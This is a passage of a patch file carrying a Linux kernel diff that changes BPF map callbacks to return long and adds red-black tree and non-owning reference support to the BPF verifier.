+-static int trie_update_elem(struct bpf_map *map,
+-			    void *_key, void *value, u64 flags)
++static long trie_update_elem(struct bpf_map *map,
++			     void *_key, void *value, u64 flags)
+ {
+ 	struct lpm_trie *trie = container_of(map, struct lpm_trie, map);
+ 	struct lpm_trie_node *node, *im_node = NULL, *new_node = NULL;
+@@ -431,7 +431,7 @@ out:
+ }
+ 
+ /* Called from syscall or from eBPF program */
+-static int trie_delete_elem(struct bpf_map *map, void *_key)
++static long trie_delete_elem(struct bpf_map *map, void *_key)
+ {
+ 	struct lpm_trie *trie = container_of(map, struct lpm_trie, map);
+ 	struct bpf_lpm_trie_key *key = _key;
+diff --git a/kernel/bpf/queue_stack_maps.c b/kernel/bpf/queue_stack_maps.c
+index 8a5e060de63bc..80f958ff63966 100644
+--- a/kernel/bpf/queue_stack_maps.c
++++ b/kernel/bpf/queue_stack_maps.c
+@@ -95,7 +95,7 @@ static void queue_stack_map_free(struct bpf_map *map)
+ 	bpf_map_area_free(qs);
+ }
+ 
+-static int __queue_map_get(struct bpf_map *map, void *value, bool delete)
++static long __queue_map_get(struct bpf_map *map, void *value, bool delete)
+ {
+ 	struct bpf_queue_stack *qs = bpf_queue_stack(map);
+ 	unsigned long flags;
+@@ -124,7 +124,7 @@ out:
+ }
+ 
+ 
+-static int __stack_map_get(struct bpf_map *map, void *value, bool delete)
++static long __stack_map_get(struct bpf_map *map, void *value, bool delete)
+ {
+ 	struct bpf_queue_stack *qs = bpf_queue_stack(map);
+ 	unsigned long flags;
+@@ -156,32 +156,32 @@ out:
+ }
+ 
+ /* Called from syscall or from eBPF program */
+-static int queue_map_peek_elem(struct bpf_map *map, void *value)
++static long queue_map_peek_elem(struct bpf_map *map, void *value)
+ {
+ 	return __queue_map_get(map, value, false);
+ }
+ 
+ /* Called from syscall or from eBPF program */
+-static int stack_map_peek_elem(struct bpf_map *map, void *value)
++static long stack_map_peek_elem(struct bpf_map *map, void *value)
+ {
+ 	return __stack_map_get(map, value, false);
+ }
+ 
+ /* Called from syscall or from eBPF program */
+-static int queue_map_pop_elem(struct bpf_map *map, void *value)
++static long queue_map_pop_elem(struct bpf_map *map, void *value)
+ {
+ 	return __queue_map_get(map, value, true);
+ }
+ 
+ /* Called from syscall or from eBPF program */
+-static int stack_map_pop_elem(struct bpf_map *map, void *value)
++static long stack_map_pop_elem(struct bpf_map *map, void *value)
+ {
+ 	return __stack_map_get(map, value, true);
+ }
+ 
+ /* Called from syscall or from eBPF program */
+-static int queue_stack_map_push_elem(struct bpf_map *map, void *value,
+-				     u64 flags)
++static long queue_stack_map_push_elem(struct bpf_map *map, void *value,
++				      u64 flags)
+ {
+ 	struct bpf_queue_stack *qs = bpf_queue_stack(map);
+ 	unsigned long irq_flags;
+@@ -227,14 +227,14 @@ static void *queue_stack_map_lookup_elem(struct bpf_map *map, void *key)
+ }
+ 
+ /* Called from syscall or from eBPF program */
+-static int queue_stack_map_update_elem(struct bpf_map *map, void *key,
+-				       void *value, u64 flags)
++static long queue_stack_map_update_elem(struct bpf_map *map, void *key,
++					void *value, u64 flags)
+ {
+ 	return -EINVAL;
+ }
+ 
+ /* Called from syscall or from eBPF program */
+-static int queue_stack_map_delete_elem(struct bpf_map *map, void *key)
++static long queue_stack_map_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	return -EINVAL;
+ }
+diff --git a/kernel/bpf/reuseport_array.c b/kernel/bpf/reuseport_array.c
+index 82c61612f382a..d1188b0350914 100644
+--- a/kernel/bpf/reuseport_array.c
++++ b/kernel/bpf/reuseport_array.c
+@@ -59,7 +59,7 @@ static void *reuseport_array_lookup_elem(struct bpf_map *map, void *key)
+ }
+ 
+ /* Called from syscall only */
+-static int reuseport_array_delete_elem(struct bpf_map *map, void *key)
++static long reuseport_array_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	struct reuseport_array *array = reuseport_array(map);
+ 	u32 index = *(u32 *)key;
+diff --git a/kernel/bpf/ringbuf.c b/kernel/bpf/ringbuf.c
+index 80f4b4d88aafa..ce8ca5511ac13 100644
+--- a/kernel/bpf/ringbuf.c
++++ b/kernel/bpf/ringbuf.c
+@@ -241,13 +241,13 @@ static void *ringbuf_map_lookup_elem(struct bpf_map *map, void *key)
+ 	return ERR_PTR(-ENOTSUPP);
+ }
+ 
+-static int ringbuf_map_update_elem(struct bpf_map *map, void *key, void *value,
+-				   u64 flags)
++static long ringbuf_map_update_elem(struct bpf_map *map, void *key, void *value,
++				    u64 flags)
+ {
+ 	return -ENOTSUPP;
+ }
+ 
+-static int ringbuf_map_delete_elem(struct bpf_map *map, void *key)
++static long ringbuf_map_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	return -ENOTSUPP;
+ }
+diff --git a/kernel/bpf/stackmap.c b/kernel/bpf/stackmap.c
+index aecea7451b610..496ce1695dd89 100644
+--- a/kernel/bpf/stackmap.c
++++ b/kernel/bpf/stackmap.c
+@@ -618,14 +618,14 @@ static int stack_map_get_next_key(struct bpf_map *map, void *key,
+ 	return 0;
+ }
+ 
+-static int stack_map_update_elem(struct bpf_map *map, void *key, void *value,
+-				 u64 map_flags)
++static long stack_map_update_elem(struct bpf_map *map, void *key, void *value,
++				  u64 map_flags)
+ {
+ 	return -EINVAL;
+ }
+ 
+ /* Called from syscall or from eBPF program */
+-static int stack_map_delete_elem(struct bpf_map *map, void *key)
++static long stack_map_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	struct bpf_stack_map *smap = container_of(map, struct bpf_stack_map, map);
+ 	struct stack_map_bucket *old_bucket;
+diff --git a/kernel/bpf/syscall.c b/kernel/bpf/syscall.c
+index ecca9366c7a6f..011983b39472f 100644
+--- a/kernel/bpf/syscall.c
++++ b/kernel/bpf/syscall.c
+@@ -527,9 +527,6 @@ void btf_record_free(struct btf_record *rec)
+ 		return;
+ 	for (i = 0; i < rec->cnt; i++) {
+ 		switch (rec->fields[i].type) {
+-		case BPF_SPIN_LOCK:
+-		case BPF_TIMER:
+-			break;
+ 		case BPF_KPTR_UNREF:
+ 		case BPF_KPTR_REF:
+ 			if (rec->fields[i].kptr.module)
+@@ -538,7 +535,11 @@ void btf_record_free(struct btf_record *rec)
+ 			break;
+ 		case BPF_LIST_HEAD:
+ 		case BPF_LIST_NODE:
+-			/* Nothing to release for bpf_list_head */
++		case BPF_RB_ROOT:
++		case BPF_RB_NODE:
++		case BPF_SPIN_LOCK:
++		case BPF_TIMER:
++			/* Nothing to release */
+ 			break;
+ 		default:
+ 			WARN_ON_ONCE(1);
+@@ -571,9 +572,6 @@ struct btf_record *btf_record_dup(const struct btf_record *rec)
+ 	new_rec->cnt = 0;
+ 	for (i = 0; i < rec->cnt; i++) {
+ 		switch (fields[i].type) {
+-		case BPF_SPIN_LOCK:
+-		case BPF_TIMER:
+-			break;
+ 		case BPF_KPTR_UNREF:
+ 		case BPF_KPTR_REF:
+ 			btf_get(fields[i].kptr.btf);
+@@ -584,7 +582,11 @@ struct btf_record *btf_record_dup(const struct btf_record *rec)
+ 			break;
+ 		case BPF_LIST_HEAD:
+ 		case BPF_LIST_NODE:
+-			/* Nothing to acquire for bpf_list_head */
++		case BPF_RB_ROOT:
++		case BPF_RB_NODE:
++		case BPF_SPIN_LOCK:
++		case BPF_TIMER:
++			/* Nothing to acquire */
+ 			break;
+ 		default:
+ 			ret = -EFAULT;
+@@ -664,7 +666,13 @@ void bpf_obj_free_fields(const struct btf_record *rec, void *obj)
+ 				continue;
+ 			bpf_list_head_free(field, field_ptr, obj + rec->spin_lock_off);
+ 			break;
++		case BPF_RB_ROOT:
++			if (WARN_ON_ONCE(rec->spin_lock_off < 0))
++				continue;
++			bpf_rb_root_free(field, field_ptr, obj + rec->spin_lock_off);
++			break;
+ 		case BPF_LIST_NODE:
++		case BPF_RB_NODE:
+ 			break;
+ 		default:
+ 			WARN_ON_ONCE(1);
+@@ -1005,7 +1013,8 @@ static int map_check_btf(struct bpf_map *map, const struct btf *btf,
+ 		return -EINVAL;
+ 
+ 	map->record = btf_parse_fields(btf, value_type,
+-				       BPF_SPIN_LOCK | BPF_TIMER | BPF_KPTR | BPF_LIST_HEAD,
++				       BPF_SPIN_LOCK | BPF_TIMER | BPF_KPTR | BPF_LIST_HEAD |
++				       BPF_RB_ROOT,
+ 				       map->value_size);
+ 	if (!IS_ERR_OR_NULL(map->record)) {
+ 		int i;
+@@ -1053,6 +1062,7 @@ static int map_check_btf(struct bpf_map *map, const struct btf *btf,
+ 				}
+ 				break;
+ 			case BPF_LIST_HEAD:
++			case BPF_RB_ROOT:
+ 				if (map->map_type != BPF_MAP_TYPE_HASH &&
+ 				    map->map_type != BPF_MAP_TYPE_LRU_HASH &&
+ 				    map->map_type != BPF_MAP_TYPE_ARRAY) {
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 9db6afc86733b..1c7dad0e79b92 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -190,6 +190,10 @@ struct bpf_verifier_stack_elem {
+ 
+ static int acquire_reference_state(struct bpf_verifier_env *env, int insn_idx);
+ static int release_reference(struct bpf_verifier_env *env, int ref_obj_id);
++static void invalidate_non_owning_refs(struct bpf_verifier_env *env);
++static bool in_rbtree_lock_required_cb(struct bpf_verifier_env *env);
++static int ref_set_non_owning(struct bpf_verifier_env *env,
++			      struct bpf_reg_state *reg);
+ 
+ static bool bpf_map_ptr_poisoned(const struct bpf_insn_aux_data *aux)
+ {
+@@ -456,6 +460,11 @@ static bool type_is_ptr_alloc_obj(u32 type)
+ 	return base_type(type) == PTR_TO_BTF_ID && type_flag(type) & MEM_ALLOC;
+ }
+ 
++static bool type_is_non_owning_ref(u32 type)
++{
++	return type_is_ptr_alloc_obj(type) && type_flag(type) & NON_OWN_REF;
++}
++
+ static struct btf_record *reg_btf_record(const struct bpf_reg_state *reg)
+ {
+ 	struct btf_record *rec = NULL;
+@@ -1044,6 +1053,8 @@ static void print_verifier_state(struct bpf_verifier_env *env,
+ 				verbose_a("id=%d", reg->id);
+ 			if (reg->ref_obj_id)
+ 				verbose_a("ref_obj_id=%d", reg->ref_obj_id);
++			if (type_is_non_owning_ref(reg->type))
++				verbose_a("%s", "non_own_ref");
+ 			if (t != SCALAR_VALUE)
+ 				verbose_a("off=%d", reg->off);
+ 			if (type_is_pkt_pointer(t))
+@@ -1599,6 +1610,16 @@ static void mark_ptr_not_null_reg(struct bpf_reg_state *reg)
+ 	reg->type &= ~PTR_MAYBE_NULL;
+ }
+ 
++static void mark_reg_graph_node(struct bpf_reg_state *regs, u32 regno,
++				struct btf_field_graph_root *ds_head)
++{
++	__mark_reg_known_zero(&regs[regno]);
++	regs[regno].type = PTR_TO_BTF_ID | MEM_ALLOC;
++	regs[regno].btf = ds_head->btf;
++	regs[regno].btf_id = ds_head->value_btf_id;
++	regs[regno].off = ds_head->node_offset;
++}
++
+ static bool reg_is_pkt_pointer(const struct bpf_reg_state *reg)
+ {
+ 	return type_is_pkt_pointer(reg->type);
+@@ -1769,9 +1790,9 @@ static void __reg_bound_offset(struct bpf_reg_state *reg)
+ 	struct tnum var64_off = tnum_intersect(reg->var_off,
+ 					       tnum_range(reg->umin_value,
+ 							  reg->umax_value));
+-	struct tnum var32_off = tnum_intersect(tnum_subreg(reg->var_off),
+-						tnum_range(reg->u32_min_value,
+-							   reg->u32_max_value));
++	struct tnum var32_off = tnum_intersect(tnum_subreg(var64_off),
++					       tnum_range(reg->u32_min_value,
++							  reg->u32_max_value));
+ 
+ 	reg->var_off = tnum_or(tnum_clear_subreg(var64_off), var32_off);
+ }
+@@ -3895,17 +3916,13 @@ static int check_stack_read(struct bpf_verifier_env *env,
+ 	}
+ 	/* Variable offset is prohibited for unprivileged mode for simplicity
+ 	 * since it requires corresponding support in Spectre masking for stack
+-	 * ALU. See also retrieve_ptr_limit().
++	 * ALU. See also retrieve_ptr_limit(). The check in
++	 * check_stack_access_for_ptr_arithmetic() called by
++	 * adjust_ptr_min_max_vals() prevents users from creating stack pointers
++	 * with variable offsets, therefore no check is required here. Further,
++	 * just checking it here would be insufficient as speculative stack
++	 * writes could still lead to unsafe speculative behaviour.
+ 	 */
+-	if (!env->bypass_spec_v1 && var_off) {
+-		char tn_buf[48];
+-
+-		tnum_strn(tn_buf, sizeof(tn_buf), reg->var_off);
+-		verbose(env, "R%d variable offset stack access prohibited for !root, var_off=%s\n",
+-				ptr_regno, tn_buf);
+-		return -EACCES;
+-	}
+-
+ 	if (!var_off) {
+ 		off += reg->var_off.value;
+ 		err = check_stack_read_fixed_off(env, state, off, size,
+@@ -5007,7 +5024,8 @@ static int check_ptr_to_btf_access(struct bpf_verifier_env *env,
+ 			return -EACCES;
+ 		}
+ 
+-		if (type_is_alloc(reg->type) && !reg->ref_obj_id) {
++		if (type_is_alloc(reg->type) && !type_is_non_owning_ref(reg->type) &&
++		    !reg->ref_obj_id) {
+ 			verbose(env, "verifier internal error: ref_obj_id for allocated object must be non-zero\n");
+ 			return -EFAULT;
+ 		}
+@@ -5990,9 +6008,7 @@ static int process_spin_lock(struct bpf_verifier_env *env, int regno,
+ 			cur->active_lock.ptr = btf;
+ 		cur->active_lock.id = reg->id;
+ 	} else {
+-		struct bpf_func_state *fstate = cur_func(env);
+ 		void *ptr;
+-		int i;
+ 
+ 		if (map)
+ 			ptr = map;
+@@ -6008,25 +6024,11 @@ static int process_spin_lock(struct bpf_verifier_env *env, int regno,
+ 			verbose(env, "bpf_spin_unlock of different lock\n");
+ 			return -EINVAL;
+ 		}
+-		cur->active_lock.ptr = NULL;
+-		cur->active_lock.id = 0;
+ 
+-		for (i = fstate->acquired_refs - 1; i >= 0; i--) {
+-			int err;
++		invalidate_non_owning_refs(env);
+ 
+-			/* Complain on error because this reference state cannot
+-			 * be freed before this point, as bpf_spin_lock critical
+-			 * section does not allow functions that release the
+-			 * allocated object immediately.
+-			 */
+-			if (!fstate->refs[i].release_on_unlock)
+-				continue;
+-			err = release_reference(env, fstate->refs[i].id);
+-			if (err) {
+-				verbose(env, "failed to release release_on_unlock reference");
+-				return err;
+-			}
+-		}
++		cur->active_lock.ptr = NULL;
++		cur->active_lock.id = 0;
+ 	}
+ 	return 0;
+ }
+@@ -6494,6 +6496,23 @@ found:
+ 	return 0;
+ }
+ 
++static struct btf_field *
++reg_find_field_offset(const struct bpf_reg_state *reg, s32 off, u32 fields)
++{
++	struct btf_field *field;
++	struct btf_record *rec;
++
++	rec = reg_btf_record(reg);
++	if (!rec)
++		return NULL;
++
++	field = btf_record_find(rec, off, fields);
++	if (!field)
++		return NULL;
++
++	return field;
++}
++
+ int check_func_arg_reg_off(struct bpf_verifier_env *env,
+ 			   const struct bpf_reg_state *reg, int regno,
+ 			   enum bpf_arg_type arg_type)
+@@ -6515,6 +6534,18 @@ int check_func_arg_reg_off(struct bpf_verifier_env *env,
+ 		 */
+ 		if (arg_type_is_dynptr(arg_type) && type == PTR_TO_STACK)
+ 			return 0;
++
++		if ((type_is_ptr_alloc_obj(type) || type_is_non_owning_ref(type)) && reg->off) {
++			if (reg_find_field_offset(reg, reg->off, BPF_GRAPH_NODE_OR_ROOT))
++				return __check_ptr_off_reg(env, reg, regno, true);
++
++			verbose(env, "R%d must have zero offset when passed to release func\n",
++				regno);
++			verbose(env, "No graph node or root found at R%d type:%s off:%d\n", regno,
++				kernel_type_name(reg->btf, reg->btf_id), reg->off);
++			return -EINVAL;
++		}
++
+ 		/* Doing check_ptr_off_reg check for the offset will catch this
+ 		 * because fixed_off_ok is false, but checking here allows us
+ 		 * to give the user a better error message.
+@@ -6549,6 +6580,7 @@ int check_func_arg_reg_off(struct bpf_verifier_env *env,
+ 	case PTR_TO_BTF_ID | PTR_TRUSTED:
+ 	case PTR_TO_BTF_ID | MEM_RCU:
+ 	case PTR_TO_BTF_ID | MEM_ALLOC | PTR_TRUSTED:
++	case PTR_TO_BTF_ID | MEM_ALLOC | NON_OWN_REF:
+ 		/* When referenced PTR_TO_BTF_ID is passed to release function,
+ 		 * its fixed offset must be 0. In the other cases, fixed offset
+ 		 * can be non-zero. This was already checked above. So pass
+@@ -6750,6 +6782,10 @@ skip_type_check:
+ 		meta->ret_btf_id = reg->btf_id;
+ 		break;
+ 	case ARG_PTR_TO_SPIN_LOCK:
++		if (in_rbtree_lock_required_cb(env)) {
++			verbose(env, "can't spin_{lock,unlock} in rbtree cb\n");
++			return -EACCES;
++		}
+ 		if (meta->func_id == BPF_FUNC_spin_lock) {
+ 			err = process_spin_lock(env, regno, true);
+ 			if (err)
+@@ -7301,6 +7337,17 @@ static int release_reference(struct bpf_verifier_env *env,
+ 	return 0;
+ }
+ 
++static void invalidate_non_owning_refs(struct bpf_verifier_env *env)
++{
++	struct bpf_func_state *unused;
++	struct bpf_reg_state *reg;
++
++	bpf_for_each_reg_in_vstate(env->cur_state, unused, reg, ({
++		if (type_is_non_owning_ref(reg->type))
++			__mark_reg_unknown(env, reg);
++	}));
++}
++
+ static void clear_caller_saved_regs(struct bpf_verifier_env *env,
+ 				    struct bpf_reg_state *regs)
+ {
+@@ -7322,6 +7369,8 @@ static int set_callee_state(struct bpf_verifier_env *env,
+ 			    struct bpf_func_state *caller,
+ 			    struct bpf_func_state *callee, int insn_idx);
+ 
++static bool is_callback_calling_kfunc(u32 btf_id);
++
+ static int __check_func_call(struct bpf_verifier_env *env, struct bpf_insn *insn,
+ 			     int *insn_idx, int subprog,
+ 			     set_callee_state_fn set_callee_state_cb)
+@@ -7376,10 +7425,18 @@ static int __check_func_call(struct bpf_verifier_env *env, struct bpf_insn *insn
+ 	 * interested in validating only BPF helpers that can call subprogs as
+ 	 * callbacks
+ 	 */
+-	if (set_callee_state_cb != set_callee_state && !is_callback_calling_function(insn->imm)) {
+-		verbose(env, "verifier bug: helper %s#%d is not marked as callback-calling\n",
+-			func_id_name(insn->imm), insn->imm);
+-		return -EFAULT;
++	if (set_callee_state_cb != set_callee_state) {
++		if (bpf_pseudo_kfunc_call(insn) &&
++		    !is_callback_calling_kfunc(insn->imm)) {
++			verbose(env, "verifier bug: kfunc %s#%d not marked as callback-calling\n",
++				func_id_name(insn->imm), insn->imm);
++			return -EFAULT;
++		} else if (!bpf_pseudo_kfunc_call(insn) &&
++			   !is_callback_calling_function(insn->imm)) { /* helper */
++			verbose(env, "verifier bug: helper %s#%d not marked as callback-calling\n",
++				func_id_name(insn->imm), insn->imm);
++			return -EFAULT;
++		}
+ 	}
+ 
+ 	if (insn->code == (BPF_JMP | BPF_CALL) &&
+@@ -7644,6 +7701,63 @@ static int set_user_ringbuf_callback_state(struct bpf_verifier_env *env,
+ 	return 0;
+ }
+ 
++static int set_rbtree_add_callback_state(struct bpf_verifier_env *env,
++					 struct bpf_func_state *caller,
++					 struct bpf_func_state *callee,
++					 int insn_idx)
++{
++	/* void bpf_rbtree_add(struct bpf_rb_root *root, struct bpf_rb_node *node,
++	 *                     bool (less)(struct bpf_rb_node *a, const struct bpf_rb_node *b));
++	 *
++	 * 'struct bpf_rb_node *node' arg to bpf_rbtree_add is the same PTR_TO_BTF_ID w/ offset
++	 * that 'less' callback args will be receiving. However, 'node' arg was release_reference'd
++	 * by this point, so look at 'root'
++	 */
++	struct btf_field *field;
++
++	field = reg_find_field_offset(&caller->regs[BPF_REG_1], caller->regs[BPF_REG_1].off,
++				      BPF_RB_ROOT);
++	if (!field || !field->graph_root.value_btf_id)
++		return -EFAULT;
++
++	mark_reg_graph_node(callee->regs, BPF_REG_1, &field->graph_root);
++	ref_set_non_owning(env, &callee->regs[BPF_REG_1]);
++	mark_reg_graph_node(callee->regs, BPF_REG_2, &field->graph_root);
++	ref_set_non_owning(env, &callee->regs[BPF_REG_2]);
++
++	__mark_reg_not_init(env, &callee->regs[BPF_REG_3]);
++	__mark_reg_not_init(env, &callee->regs[BPF_REG_4]);
++	__mark_reg_not_init(env, &callee->regs[BPF_REG_5]);
++	callee->in_callback_fn = true;
++	callee->callback_ret_range = tnum_range(0, 1);
++	return 0;
++}
++
++static bool is_rbtree_lock_required_kfunc(u32 btf_id);
++
++/* Are we currently verifying the callback for a rbtree helper that must
++ * be called with lock held? If so, no need to complain about unreleased
++ * lock
++ */
++static bool in_rbtree_lock_required_cb(struct bpf_verifier_env *env)
++{
++	struct bpf_verifier_state *state = env->cur_state;
++	struct bpf_insn *insn = env->prog->insnsi;
++	struct bpf_func_state *callee;
++	int kfunc_btf_id;
++
++	if (!state->curframe)
++		return false;
++
++	callee = state->frame[state->curframe];
++
++	if (!callee->in_callback_fn)
++		return false;
++
++	kfunc_btf_id = insn[callee->callsite].imm;
++	return is_rbtree_lock_required_kfunc(kfunc_btf_id);
++}
++
+ static int prepare_func_exit(struct bpf_verifier_env *env, int *insn_idx)
+ {
+ 	struct bpf_verifier_state *state = env->cur_state;
+@@ -8395,6 +8509,7 @@ struct bpf_kfunc_call_arg_meta {
+ 	bool r0_rdonly;
+ 	u32 ret_btf_id;
+ 	u64 r0_size;
++	u32 subprogno;
+ 	struct {
+ 		u64 value;
+ 		bool found;
+@@ -8406,6 +8521,9 @@ struct bpf_kfunc_call_arg_meta {
+ 	struct {
+ 		struct btf_field *field;
+ 	} arg_list_head;
++	struct {
++		struct btf_field *field;
++	} arg_rbtree_root;
+ };
+ 
+ static bool is_kfunc_acquire(struct bpf_kfunc_call_arg_meta *meta)
+@@ -8517,12 +8635,16 @@ enum {
+ 	KF_ARG_DYNPTR_ID,
+ 	KF_ARG_LIST_HEAD_ID,
+ 	KF_ARG_LIST_NODE_ID,
++	KF_ARG_RB_ROOT_ID,
++	KF_ARG_RB_NODE_ID,
+ };
+ 
+ BTF_ID_LIST(kf_arg_btf_ids)
+ BTF_ID(struct, bpf_dynptr_kern)
+ BTF_ID(struct, bpf_list_head)
+ BTF_ID(struct, bpf_list_node)
++BTF_ID(struct, bpf_rb_root)
++BTF_ID(struct, bpf_rb_node)
+ 
+ static bool __is_kfunc_ptr_arg_type(const struct btf *btf,
+ 				    const struct btf_param *arg, int type)
+@@ -8556,6 +8678,28 @@ static bool is_kfunc_arg_list_node(const struct btf *btf, const struct btf_param
+ 	return __is_kfunc_ptr_arg_type(btf, arg, KF_ARG_LIST_NODE_ID);
+ }
+ 
++static bool is_kfunc_arg_rbtree_root(const struct btf *btf, const struct btf_param *arg)
++{
++	return __is_kfunc_ptr_arg_type(btf, arg, KF_ARG_RB_ROOT_ID);
++}
++
++static bool is_kfunc_arg_rbtree_node(const struct btf *btf, const struct btf_param *arg)
++{
++	return __is_kfunc_ptr_arg_type(btf, arg, KF_ARG_RB_NODE_ID);
++}
++
++static bool is_kfunc_arg_callback(struct bpf_verifier_env *env, const struct btf *btf,
++				  const struct btf_param *arg)
++{
++	const struct btf_type *t;
++
++	t = btf_type_resolve_func_ptr(btf, arg->type, NULL);
++	if (!t)
++		return false;
++
++	return true;
++}
++
+ /* Returns true if struct is composed of scalars, 4 levels of nesting allowed */
+ static bool __btf_type_is_scalar_struct(struct bpf_verifier_env *env,
+ 					const struct btf *btf,
+@@ -8615,6 +8759,9 @@ enum kfunc_ptr_arg_type {
+ 	KF_ARG_PTR_TO_BTF_ID,	     /* Also covers reg2btf_ids conversions */
+ 	KF_ARG_PTR_TO_MEM,
+ 	KF_ARG_PTR_TO_MEM_SIZE,	     /* Size derived from next argument, skip it */
++	KF_ARG_PTR_TO_CALLBACK,
++	KF_ARG_PTR_TO_RB_ROOT,
++	KF_ARG_PTR_TO_RB_NODE,
+ };
+ 
+ enum special_kfunc_type {
+@@ -8628,6 +8775,9 @@ enum special_kfunc_type {
+ 	KF_bpf_rdonly_cast,
+ 	KF_bpf_rcu_read_lock,
+ 	KF_bpf_rcu_read_unlock,
++	KF_bpf_rbtree_remove,
++	KF_bpf_rbtree_add,
++	KF_bpf_rbtree_first,
+ };
+ 
+ BTF_SET_START(special_kfunc_set)
+@@ -8639,6 +8789,9 @@ BTF_ID(func, bpf_list_pop_front)
+ BTF_ID(func, bpf_list_pop_back)
+ BTF_ID(func, bpf_cast_to_kern_ctx)
+ BTF_ID(func, bpf_rdonly_cast)
++BTF_ID(func, bpf_rbtree_remove)
++BTF_ID(func, bpf_rbtree_add)
++BTF_ID(func, bpf_rbtree_first)
+ BTF_SET_END(special_kfunc_set)
+ 
+ BTF_ID_LIST(special_kfunc_list)
+@@ -8652,6 +8805,9 @@ BTF_ID(func, bpf_cast_to_kern_ctx)
+ BTF_ID(func, bpf_rdonly_cast)
+ BTF_ID(func, bpf_rcu_read_lock)
+ BTF_ID(func, bpf_rcu_read_unlock)
++BTF_ID(func, bpf_rbtree_remove)
++BTF_ID(func, bpf_rbtree_add)
++BTF_ID(func, bpf_rbtree_first)
+ 
+ static bool is_kfunc_bpf_rcu_read_lock(struct bpf_kfunc_call_arg_meta *meta)
+ {
+@@ -8713,6 +8869,12 @@ get_kfunc_ptr_arg_type(struct bpf_verifier_env *env,
+ 	if (is_kfunc_arg_list_node(meta->btf, &args[argno]))
+ 		return KF_ARG_PTR_TO_LIST_NODE;
+ 
++	if (is_kfunc_arg_rbtree_root(meta->btf, &args[argno]))
++		return KF_ARG_PTR_TO_RB_ROOT;
++
++	if (is_kfunc_arg_rbtree_node(meta->btf, &args[argno]))
++		return KF_ARG_PTR_TO_RB_NODE;
++
+ 	if ((base_type(reg->type) == PTR_TO_BTF_ID || reg2btf_ids[base_type(reg->type)])) {
+ 		if (!btf_type_is_struct(ref_t)) {
+ 			verbose(env, "kernel function %s args#%d pointer type %s %s is not supported\n",
+@@ -8722,6 +8884,9 @@ get_kfunc_ptr_arg_type(struct bpf_verifier_env *env,
+ 		return KF_ARG_PTR_TO_BTF_ID;
+ 	}
+ 
++	if (is_kfunc_arg_callback(env, meta->btf, &args[argno]))
++		return KF_ARG_PTR_TO_CALLBACK;
++
+ 	if (argno + 1 < nargs && is_kfunc_arg_mem_size(meta->btf, &args[argno + 1], &regs[regno + 1]))
+ 		arg_mem_size = true;
+ 
+@@ -8808,38 +8973,54 @@ static int process_kf_arg_ptr_to_kptr(struct bpf_verifier_env *env,
+ 	return 0;
+ }
+ 
+-static int ref_set_release_on_unlock(struct bpf_verifier_env *env, u32 ref_obj_id)
++static int ref_set_non_owning(struct bpf_verifier_env *env, struct bpf_reg_state *reg)
+ {
+-	struct bpf_func_state *state = cur_func(env);
++	struct bpf_verifier_state *state = env->cur_state;
++
++	if (!state->active_lock.ptr) {
++		verbose(env, "verifier internal error: ref_set_non_owning w/o active lock\n");
++		return -EFAULT;
++	}
++
++	if (type_flag(reg->type) & NON_OWN_REF) {
++		verbose(env, "verifier internal error: NON_OWN_REF already set\n");
++		return -EFAULT;
++	}
++
++	reg->type |= NON_OWN_REF;
++	return 0;
++}
++
++static int ref_convert_owning_non_owning(struct bpf_verifier_env *env, u32 ref_obj_id)
++{
++	struct bpf_func_state *state, *unused;
+ 	struct bpf_reg_state *reg;
+ 	int i;
+ 
+-	/* bpf_spin_lock only allows calling list_push and list_pop, no BPF
+-	 * subprogs, no global functions. This means that the references would
+-	 * not be released inside the critical section but they may be added to
+-	 * the reference state, and the acquired_refs are never copied out for a
+-	 * different frame as BPF to BPF calls don't work in bpf_spin_lock
+-	 * critical sections.
+-	 */
++	state = cur_func(env);
++
+ 	if (!ref_obj_id) {
+-		verbose(env, "verifier internal error: ref_obj_id is zero for release_on_unlock\n");
++		verbose(env, "verifier internal error: ref_obj_id is zero for "
++			     "owning -> non-owning conversion\n");
+ 		return -EFAULT;
+ 	}
++
+ 	for (i = 0; i < state->acquired_refs; i++) {
+-		if (state->refs[i].id == ref_obj_id) {
+-			if (state->refs[i].release_on_unlock) {
+-				verbose(env, "verifier internal error: expected false release_on_unlock");
+-				return -EFAULT;
++		if (state->refs[i].id != ref_obj_id)
++			continue;
++
++		/* Clear ref_obj_id here so release_reference doesn't clobber
++		 * the whole reg
++		 */
++		bpf_for_each_reg_in_vstate(env->cur_state, unused, reg, ({
++			if (reg->ref_obj_id == ref_obj_id) {
++				reg->ref_obj_id = 0;
++				ref_set_non_owning(env, reg);
+ 			}
+-			state->refs[i].release_on_unlock = true;
+-			/* Now mark everyone sharing same ref_obj_id as untrusted */
+-			bpf_for_each_reg_in_vstate(env->cur_state, state, reg, ({
+-				if (reg->ref_obj_id == ref_obj_id)
+-					reg->type |= PTR_UNTRUSTED;
+-			}));
+-			return 0;
+-		}
++		}));
++		return 0;
+ 	}
++
+ 	verbose(env, "verifier internal error: ref state missing for ref_obj_id\n");
+ 	return -EFAULT;
+ }
+@@ -8925,101 +9106,226 @@ static bool is_bpf_list_api_kfunc(u32 btf_id)
+ 	       btf_id == special_kfunc_list[KF_bpf_list_pop_back];
+ }
+ 
+-static int process_kf_arg_ptr_to_list_head(struct bpf_verifier_env *env,
+-					   struct bpf_reg_state *reg, u32 regno,
+-					   struct bpf_kfunc_call_arg_meta *meta)
++static bool is_bpf_rbtree_api_kfunc(u32 btf_id)
++{
++	return btf_id == special_kfunc_list[KF_bpf_rbtree_add] ||
++	       btf_id == special_kfunc_list[KF_bpf_rbtree_remove] ||
++	       btf_id == special_kfunc_list[KF_bpf_rbtree_first];
++}
++
++static bool is_bpf_graph_api_kfunc(u32 btf_id)
+ {
++	return is_bpf_list_api_kfunc(btf_id) || is_bpf_rbtree_api_kfunc(btf_id);
++}
++
++static bool is_callback_calling_kfunc(u32 btf_id)
++{
++	return btf_id == special_kfunc_list[KF_bpf_rbtree_add];
++}
++
++static bool is_rbtree_lock_required_kfunc(u32 btf_id)
++{
++	return is_bpf_rbtree_api_kfunc(btf_id);
++}
++
++static bool check_kfunc_is_graph_root_api(struct bpf_verifier_env *env,
++					  enum btf_field_type head_field_type,
++					  u32 kfunc_btf_id)
++{
++	bool ret;
++
++	switch (head_field_type) {
